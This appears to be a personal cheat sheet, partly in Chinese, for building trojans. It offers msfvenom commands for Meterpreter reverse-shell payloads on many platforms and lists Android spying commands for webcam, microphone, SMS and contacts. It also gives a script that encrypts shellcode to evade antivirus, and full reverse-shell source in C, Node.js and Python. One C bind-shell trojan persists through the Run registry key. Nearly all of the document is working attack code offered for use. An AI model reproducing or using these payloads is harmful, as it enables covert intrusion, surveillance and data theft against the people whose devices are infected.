Trojan


msfvenom

msfconsole

use exploit/multi/handler
set payload ****/meterpreter/reverse_tcp 
show options 
set LHOST=192.168.0.106
set LHOST 192.168.0.106
set LPORT 5555

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > ./shell.apk

help:

Stdapi: Webcam Commands
===================================
    webcam_list  列出网络摄像头
    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒
    webcam_chat  开始视频聊天
    webcam_snap  从指定的摄像头获取快照
    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]
Android Commands
=================
	activity_start  从URI字符串启动Android活动
	check_root  检查设备是否有根
	dump_calllog  获取调用日志
	dump_contacts  获取联系人列表
	dump_sms  获取短信
	geolocate  利用地理定位获取当前LAT
	wlan_geolocate  利用WLAN信息获取当前LAT
	hide_app_icon  从发射器隐藏应用程序图标
	interval_collect  管理区间收集能力
	send_sms  从目标会话发送短消息
	set_audio_mode
	sqlite_query  从存储库查询SQLite数据库
	wakelock  启用/禁用Wakelock

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe -o shell.exe

1

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw
wget https://github.com/clinicallyinane/shellcode_launcher/blob/master/shellcode_launcher.exe
shellcode_launcher.exe -i shellcode.raw

2

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw
git clone https://github.com/Arno0x/ShellcodeWrapper
cd ShellcodeWrapper
python shellcode_encoder.py -cpp -cs -py shellcode.raw sir_123 xor

shellcode_encoder.py python3

#!/usr/bin/python3
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Modify: cc-sir
#

import argparse
from Crypto.Hash import MD5
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
from os import urandom
from string import Template
import os

# Template source file per output language; the key doubles as the
# language selector used by the format* helpers below.
templates = dict(
	cpp='./templates/encryptedShellcodeWrapper.cpp',
	csharp='./templates/encryptedShellcodeWrapper.cs',
	python='./templates/encryptedShellcodeWrapper.py',
)

# Destination of the generated wrapper per language; the cipher name is
# spliced in before the extension when the file is actually written.
resultFiles = dict(
	cpp='./result/encryptedShellcodeWrapper.cpp',
	csharp='./result/encryptedShellcodeWrapper.cs',
	python='./result/encryptedShellcodeWrapper.py',
)

# data as a bytearray
# key as a string
def xor(data, key):
	"""Return ``data`` XOR-ed byte-wise with the repeating key ``key``.

	``data`` is any byte sequence (the caller passes a bytearray); ``key`` is a
	str whose code points are cycled over the input. The result is ``bytes`` of
	the same length as ``data``. An empty key with non-empty data raises
	ZeroDivisionError, as in the original modulo expression.
	"""
	key_codes = [ord(ch) for ch in key]
	key_len = len(key_codes)
	out = bytearray(len(data))
	for idx, value in enumerate(data):
		out[idx] = value ^ key_codes[idx % key_len]
	return bytes(out)

#------------------------------------------------------------------------
def pad(s):
	"""PKCS7 padding: extend ``s`` to a multiple of ``AES.block_size``.

	Between 1 and ``AES.block_size`` pad characters are appended, each equal
	to the pad length. The padding is built with ``chr`` and joined with
	``+``, so ``s`` is expected to be a ``str`` here.
	"""
	pad_len = AES.block_size - len(s) % AES.block_size
	return s + chr(pad_len) * pad_len

#------------------------------------------------------------------------
def aesEncrypt(clearText, key):
	"""Encrypt ``clearText`` with AES-CBC under ``key``; return iv || ciphertext.

	A fresh ``AES.block_size``-byte IV is drawn from ``os.urandom`` on every
	call, so the same input encrypts differently each run. ``clearText`` is
	PKCS7-padded with ``pad`` first and converted to ``bytes`` before
	encryption.
	"""
	iv = urandom(AES.block_size)
	padded = pad(clearText)
	cbc = AES.new(key, AES.MODE_CBC, iv)
	return iv + cbc.encrypt(bytes(padded))

def convertFromTemplate(parameters, templateFile):
	"""Render ``templateFile`` as a ``string.Template`` with ``parameters``.

	Returns the substituted text. If the file cannot be opened or read, an
	error line is printed and ``None`` is returned. A placeholder missing from
	``parameters`` makes ``Template.substitute`` raise ``KeyError``, which is
	not handled here.
	"""
	try:
		with open(templateFile) as handle:
			template_text = handle.read()
	except IOError:
		print (color("[!] Could not open or read template file [{}]".format(templateFile)))
		return None
	return Template(template_text).substitute(parameters)

def formatCPP(data, key, cipherType):
	"""Write the C++ wrapper for ``data`` under the ``result`` directory.

	``data`` (bytes) is rendered as a "\\x.." escaped literal; ``key`` and
	``cipherType`` are substituted into the template unchanged. The output
	path is ``resultFiles['cpp']`` with "_<cipherType>" inserted before the
	extension. Failures are reported via ``color`` rather than raised.
	"""
	literal = "\\x" + "\\x".join(format(byte, "02x") for byte in data)
	rendered = convertFromTemplate(
		{"shellcode": literal, "key": key, "cipherType": cipherType},
		templates["cpp"],
	)
	if rendered is None:
		return
	base, ext = os.path.splitext(resultFiles["cpp"])
	fileName = base + "_" + cipherType + ext
	try:
		with open(fileName, "w+") as out:
			out.write(rendered)
			print (color("[+] C++ code file saved in [{}]".format(fileName)))
	except IOError:
		print (color("[!] Could not write C++ code  [{}]".format(fileName)))

# data as a bytearray
def formatCSharp(data, key, cipherType):
	"""Write the C# wrapper for ``data`` under the ``result`` directory.

	``data`` (bytes) is rendered as a comma-separated "0x.." list; ``key``
	and ``cipherType`` are substituted into the template unchanged. The output
	path is ``resultFiles['csharp']`` with "_<cipherType>" inserted before
	the extension. Failures are reported via ``color`` rather than raised.
	"""
	literal = "0x" + ",0x".join(format(byte, "02x") for byte in data)
	rendered = convertFromTemplate(
		{"shellcode": literal, "key": key, "cipherType": cipherType},
		templates["csharp"],
	)
	if rendered is None:
		return
	base, ext = os.path.splitext(resultFiles["csharp"])
	fileName = base + "_" + cipherType + ext
	try:
		with open(fileName, "w+") as out:
			out.write(rendered)
			print (color("[+] C# code file saved in [{}]".format(fileName)))
	except IOError:
		print (color("[!] Could not write C# code  [{}]".format(fileName)))

#------------------------------------------------------------------------
# data as a bytearray
def formatPy(data, key, cipherType):
	"""Write the Python wrapper for ``data`` under the ``result`` directory.

	``data`` (bytes) is rendered as a "\\x.." escaped literal; ``key`` and
	``cipherType`` are substituted into the template unchanged. The output
	path is ``resultFiles['python']`` with "_<cipherType>" inserted before
	the extension. Failures are reported via ``color`` rather than raised.
	"""
	literal = "\\x" + "\\x".join(format(byte, "02x") for byte in data)
	rendered = convertFromTemplate(
		{"shellcode": literal, "key": key, "cipherType": cipherType},
		templates["python"],
	)
	if rendered is None:
		return
	base, ext = os.path.splitext(resultFiles["python"])
	fileName = base + "_" + cipherType + ext
	try:
		with open(fileName, "w+") as out:
			out.write(rendered)
			print (color("[+] Python code file saved in [{}]".format(fileName)))
	except IOError:
		print (color("[!] Could not write Python code  [{}]".format(fileName)))

# data as a bytearray
def formatB64(data):
	"""Return the standard base64 encoding of the bytes-like ``data`` as ``bytes``."""
	encoded = b64encode(data)
	return encoded

def color(string, color=None):
    """
    Author: HarmJ0y, borrowed from Empire
    Change text color for the Linux terminal.

    With an explicit ``color`` ("red", "green" or "blue", any case) the text
    is always wrapped in a bold escape sequence, colored when the name is
    recognised. Without one, the color is picked from the message prefix
    after stripping whitespace ([!] red, [+] green, [?] yellow, [*] blue);
    text with no known prefix is returned untouched.
    """
    named_codes = {"red": "31", "green": "32", "blue": "34"}
    prefix_codes = (("[!]", "31"), ("[+]", "32"), ("[?]", "33"), ("[*]", "34"))
    codes = ["1"]  # bold is always on when an escape sequence is emitted

    def wrapped():
        return "\x1b[%sm%s\x1b[0m" % (";".join(codes), string)

    if color:
        code = named_codes.get(color.lower())
        if code is not None:
            codes.append(code)
        return wrapped()

    stripped = string.strip()
    for prefix, code in prefix_codes:
        if stripped.startswith(prefix):
            codes.append(code)
            return wrapped()
    return string

if __name__ == '__main__':
	#------------------------------------------------------------------------
	# Parse arguments
	# Positional: input file, key string, cipher ('xor' or 'aes'); flags pick
	# which output formats are produced. Nothing is written unless a flag is set.
	parser = argparse.ArgumentParser()
	parser.add_argument("shellcodeFile", help="File name containing the raw shellcode to be encoded/encrypted")
	parser.add_argument("key", help="Key used to transform (XOR or AES encryption) the shellcode")
	parser.add_argument("encryptionType", help="Encryption algorithm to apply to the shellcode", choices=['xor','aes'])
	parser.add_argument("-b64", "--base64", help="Display transformed shellcode as base64 encoded string", action="store_true")
	parser.add_argument("-cpp", "--cplusplus", help="Generates C++ file code", action="store_true")
	parser.add_argument("-cs", "--csharp", help="Generates C# file code", action="store_true")
	parser.add_argument("-py", "--python", help="Generates Python file code", action="store_true")
	args = parser.parse_args() 

	# Check that required directories and path are available, if not create them
	if not os.path.isdir("./result"):
		os.makedirs("./result")
		print (color("[+] Creating [./result] directory for resulting code files"))

	# Open shellcode file and read all bytes from it
	# The whole file is read into a bytearray; an unreadable file ends the run.
	try:
		with open(args.shellcodeFile,"rb") as shellcodeFileHandle:
			shellcodeBytes = bytearray(shellcodeFileHandle.read())
			shellcodeFileHandle.close()
			print (color("[*] Shellcode file [{}] successfully loaded".format(args.shellcodeFile)))
	except IOError:
		print (color("[!] Could not open or read file [{}]".format(args.shellcodeFile)))
		quit()

	# MD5 of the untransformed input is printed so the original blob can be matched later.
	print (color("[*] MD5 hash of the initial shellcode: [{}]".format(MD5.new(shellcodeBytes).hexdigest())))
	print (color("[*] Shellcode size: [{}] bytes".format(len(shellcodeBytes))))

	# Perform AES128 transformation
	if args.encryptionType == 'aes':
		# Derive a 16 bytes (128 bits) master key from the provided key
		# scrypt with a fixed salt and cost parameters N=1024, r=1, p=1; the
		# base64 form of the derived key is what gets embedded in the wrappers.
		key = pyscrypt.hash(args.key, "saltmegood", 1024, 1, 1, 16)
		masterKey = formatB64(key)
		print (color("[*] AES encrypting the shellcode with 128 bits derived key [{}]".format(masterKey)))
		transformedShellcode = aesEncrypt(shellcodeBytes, key)
		cipherType = 'aes'

	# Perform XOR transformation
	elif args.encryptionType == 'xor':
		# The user-supplied key string is used as-is, both for xor() and in the wrappers.
		masterKey = args.key
		print (color("[*] XOR encoding the shellcode with key [{}]".format(masterKey)))
		transformedShellcode = xor(shellcodeBytes, masterKey)
		cipherType = 'xor'

	# Display interim results
	print ("\n==================================== RESULT ====================================\n")
	print (color("[*] Encrypted shellcode size: [{}] bytes".format(len(transformedShellcode))))

	# Display formated output
	# Each selected format is independent; the format* helpers handle their own errors.
	if args.base64:
		print (color("[*] Transformed shellcode as a base64 encoded string"))		
		print (formatB64(transformedShellcode))
		print ("")
	
	if args.cplusplus:
		print (color("[*] Generating C++ code file"))
		formatCPP(transformedShellcode, masterKey, cipherType)
		print ("")
		

	if args.csharp:
		print (color("[*] Generating C# code file"))
		formatCSharp(transformedShellcode, masterKey, cipherType)
		print ("")

	if args.python:
		print (color("[*] Generating Python code file"))
		formatPy(transformedShellcode, masterKey, cipherType)
		print ("")

3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f c -o msf.txt

code:

cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
wget https://github.com/DimopoulosElias/SimpleShellcodeInjector/raw/master/SimpleShellcodeInjector.c
i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
ssi.exe code

ssi

反向链接

c/c++

//#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

int _tmain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR LpszCmdLine,int nCmdShow)
{
	/* Reverse-connect sample: dials the hard-coded IP/port below and starts
	 * cmd.exe with its standard handles pointed at the socket, so the remote
	 * end drives the shell. The address/port pair is the sample's network
	 * indicator; the process runs with a hidden window (SW_HIDE). */
	WSADATA wd;
	SOCKET sock;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	struct sockaddr_in sin;
	char IP[16]="172.16.217.1\x00"; // remote address to connect back to
	unsigned short port=1234; // remote port
	memset(&si,0,sizeof(si));
	WSAStartup(MAKEWORD(1,1),&wd);
	sock = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);
	sin.sin_addr.s_addr = inet_addr(IP);

	connect(sock,(struct sockaddr*)&sin,sizeof(sin));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock; // the socket becomes the child's stdin/stdout/stderr
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi); // handles are inherited (bInheritHandles = TRUE)
	return 0;
}

node.js

// Reverse-connect sample for Node.js: writes the `uuid` marker to a temp path,
// spawns the platform shell and pipes it over a TCP connection to ip:port.
var ip = '192.168.56.1'; // remote host (network indicator)
var port = 1234; // remote port
var uuid = '53AC6D78-0F97-1895-967C-D0ECA5041A8C'; // marker string written to disk (host indicator)
(function () {
    var os = require('os');
    var fs = require('fs');
    var net = require('net');
    var cp = require('child_process');
    var osarch = os.platform();
    if (osarch == 'win32') {
        // write errors are ignored (empty callback)
        fs.writeFile('C:\\Windows\\Temp\\uuid', uuid, 'utf8', function (error) { });
        var sh = cp.spawn('cmd', [],);
    } else {
        fs.writeFile('/tmp/uuid', uuid, 'utf8', function (error) { });
        var sh = cp.spawn('/bin/bash', []);
    }
    var client = new net.Socket();
    client.connect(port, ip, function () {
        // bidirectional bridge: socket -> shell stdin, shell stdout/stderr -> socket
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

主动链接

//#include "stdafx.h"
#include <winsock2.h>
#include <Windows.h>
#include <string.h>
#pragma comment(lib,"ws2_32.lib")
#define MasterPort 999
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 
//windows控制台程序不出黑窗口
int add_reg(){ // register for autostart at logon and copy self into C:\Windows
	// Run key under HKLM, WOW6432Node view; the commented line is the native path.
	char regname[] = "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run";
	//"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	HKEY hkResult;
	int ret;
	ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
	//ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regname, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkResult);
	// Value name "MiniMuma" pointing at C:\Windows\MiniMuma.exe (REG_EXPAND_SZ); these two
	// artefacts (the Run value and the copied file) are the sample's host indicators.
	ret = RegSetValueEx(hkResult,"MiniMuma",0,REG_EXPAND_SZ,(unsigned char *)"C:\\Windows\\MiniMuma.exe",25);
	
	char modlepath[256];
	char syspath[256];
	GetModuleFileName(0,modlepath,256); // full path of the running executable
	ret = CopyFile(modlepath,strcat(syspath,"C:\\Windows\\MiniMuma.exe"),1); // bFailIfExists = 1
	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
	/* Bind-shell sample: after add_reg(), listens on MasterPort, reads one
	 * message from the first client and compares it with a fixed password.
	 * On a match, COMSPEC (cmd.exe) is started with its stdio handles bound
	 * to the accepted socket and the loop waits for it to exit; "quite\n"
	 * ends the loop; anything else is rejected. The sockets are closed and
	 * re-created on every pass. */
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	char szCMDPath[255];
	char Pass[256];
	add_reg();
	while(1){
		ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
		ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
		ZeroMemory(&WSADa,sizeof(WSADATA));
		ZeroMemory(&Pass,sizeof(Pass));

		GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath)); // shell path comes from the environment
		WSAStartup(0x0202,&WSADa);
	
		SockAddrIn.sin_family = AF_INET;
		SockAddrIn.sin_addr.s_addr = INADDR_ANY; // listens on all interfaces
		SockAddrIn.sin_port = htons(MasterPort);
		CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

		bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));

		listen(CSocket,1);
		iAddrSize = sizeof(SockAddrIn);
		SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize); // blocks until one client connects
		StartupInfo.cb = sizeof(STARTUPINFO);
		StartupInfo.wShowWindow = SW_HIDE;
		StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
		StartupInfo.hStdError = (HANDLE)SSocket;
		StartupInfo.hStdInput = (HANDLE)SSocket;
		StartupInfo.hStdOutput = (HANDLE)SSocket;
		int ret,ret2;
		recv(SSocket,Pass,256,0); // single recv; the whole line incl. "\n" is compared
		ret = strcmp(Pass,"cc_sir\n");	//Passwd
		ret2 = strcmp(Pass,"quite\n");	//quite
		
		if(ret == 0){
			// password matched: run the shell on the socket and block until it exits
			CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
			WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
			CloseHandle(ProcessInfo.hProcess);
			CloseHandle(ProcessInfo.hThread);

			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
		else if(ret2 == 0){
			// "quite" command: acknowledge and leave the loop (process ends)
			send(SSocket,"MiniMuma quite!\n",sizeof("MiniMuma quite!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
			break;
		}
		else{
			// wrong password: report, drop the client and listen again
			send(SSocket,"Passwd is Error!\n",sizeof("Passwd is Error!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
	}
	return 0;
}

python

python3 Windows反弹shell:

import os
import socket
import subprocess
import threading
import sys

def s2p(s, p):
    """Forward data from socket ``s`` to the stdin of process ``p``, forever.

    ``recv`` yields bytes; they are decoded because ``p`` is opened in text
    mode (``text=True``) by the caller.
    """
    while True:
        p.stdin.write(s.recv(1024).decode())
        p.stdin.flush()

def p2s(s, p):
    """Forward the stdout of process ``p`` to socket ``s`` one character at a time, forever."""
    while True:
        s.send(p.stdout.read(1).encode())

# Reverse-connect sample: keep retrying the TCP connection to the hard-coded
# address until it succeeds, then bridge a PowerShell process to the socket
# with two daemon threads. Runs until PowerShell exits or the wait is interrupted.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
    try:
        s.connect(("192.168.56.1", 1234))  # remote host/port: the sample's network indicator
        break
    except:  # bare except: every failure, including KeyboardInterrupt, retries
        pass

# PowerShell with stdin/stdout as text-mode pipes and stderr merged into stdout.
p = subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE,
                    stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)

# One pump per direction; daemon threads die with the main thread.
threading.Thread(target=s2p, args=[s, p], daemon=True).start()
threading.Thread(target=p2s, args=[s, p], daemon=True).start()

# Block until PowerShell exits; any exception during the wait closes the socket and exits.
try:
    p.wait()
except:
    s.close()
    sys.exit(0)
import os
import socket
import subprocess
# Reverse-connect command loop: connect to HOST:PORT, then repeatedly send a
# prompt, read one line and run it via `cmd /c`, returning the captured output.
HOST = '192.168.56.1'  # remote host (network indicator)
PORT = 1234  # remote port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(str.encode("[*] Connection Established!\n"))

while 1:
    try:
        s.send(str.encode(os.getcwd() + "> "))  # prompt shows the current working directory
        data = s.recv(1024).decode("UTF-8")
        data = data.strip('\n')  # only "\n" is stripped, not "\r"
        if data == "exit" or data == "quit":
            break
        if data[:2] == "cd":
            os.chdir(data[3:])  # "cd <dir>" changes this process's cwd; the line is still passed to cmd below
        if len(data) > 0:
            print("data: " + data)
            proc = subprocess.Popen(["cmd", "/c", data], shell=True,
                                    stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = proc.stdout.read() + proc.stderr.read()  # all of stdout, then all of stderr
            output_str = str(stdout_value, "UTF-8")
            s.send(str.encode("\n" + output_str))
    except Exception as e:
        continue  # any failure in this iteration is dropped; the prompt loop goes on

s.close()

python2和python3都可以:

import select
import socket
import subprocess
# Reverse-connect command loop (Python 2 and 3): connect once, then wait with
# select() for input, run each line via `cmd /c` and send back its stdout.
try:
    shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    shell.connect(("192.168.56.1", 1234))  # remote host/port (network indicator)
except Exception as reason:
    print ('[-] Failed to Create Socket : %s' %reason)
    exit(0)
rlist = [shell]
wlist = []
elist = [shell]  # built but unused: select() below is given wlist as its error list
while True:
    shell.send(b"cmd:")
    rs, ws,es = select.select(rlist,wlist,wlist)
    for sockfd in rs:
        if sockfd == shell:
            command = shell.recv(1024)
            # str form matches Python 2, bytes form Python 3
            if command == 'exit\n' or command == b'exit\n':
                shell.close()
                exit(0)
            # only stdout (result) is returned; stderr (error) is discarded
            result, error = subprocess.Popen(
                ["cmd", "/c", command], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
            shell.sendall(result)

other

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f elf > shell.elf
# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f exe > shell.exe
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f num
# Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f macho > shell.machoWeb
# PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f raw > shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f asp > shell.asp
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f raw > shell.jsp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f war > shell.war
# Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.102 LPORT=4444  -f raw > shell.py
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.102 LPORT=4444  -f raw > shell.sh
# Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.102  LPORT=4444  -f raw > shell.pl
# C
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102  LPORT=4444 -f c > shellcode.c  
# C#
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f csharp > shellcode.txt   